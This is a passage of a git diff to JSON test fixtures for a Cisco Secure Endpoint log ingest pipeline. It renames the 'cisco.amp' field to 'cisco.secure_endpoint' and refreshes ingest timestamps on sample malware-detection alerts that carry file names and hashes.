                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3217,7 +3202,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3299,7 +3284,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546158553Z",
+                "ingested": "2021-09-27T00:41:08.619345019Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3310,7 +3295,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3384,7 +3369,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546160597Z",
+                "ingested": "2021-09-27T00:41:08.619346764Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3395,7 +3380,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3469,7 +3454,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546162684Z",
+                "ingested": "2021-09-27T00:41:08.619348487Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3480,7 +3465,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3548,7 +3533,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546164735Z",
+                "ingested": "2021-09-27T00:41:08.619350225Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3559,7 +3544,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3626,7 +3611,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:41.546166865Z",
+                "ingested": "2021-09-27T00:41:08.619351968Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:17:41.000Z",
@@ -3637,7 +3622,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3708,7 +3693,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546168922Z",
+                "ingested": "2021-09-27T00:41:08.619353708Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3719,7 +3704,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -3791,7 +3776,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546175169Z",
+                "ingested": "2021-09-27T00:41:08.619355437Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3802,7 +3787,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
index bcf087a5dee..2f5cd52d9f5 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
@@ -34,7 +34,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271886158Z",
+                "ingested": "2021-09-27T00:41:21.853374465Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -45,7 +45,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -117,7 +117,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271892093Z",
+                "ingested": "2021-09-27T00:41:21.853378663Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -128,7 +128,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -200,7 +200,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271894245Z",
+                "ingested": "2021-09-27T00:41:21.853380563Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -211,7 +211,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -283,7 +283,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271896176Z",
+                "ingested": "2021-09-27T00:41:21.853382340Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -294,7 +294,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -366,7 +366,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271898088Z",
+                "ingested": "2021-09-27T00:41:21.853384127Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -377,7 +377,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -449,7 +449,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271900010Z",
+                "ingested": "2021-09-27T00:41:21.853385897Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -460,7 +460,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
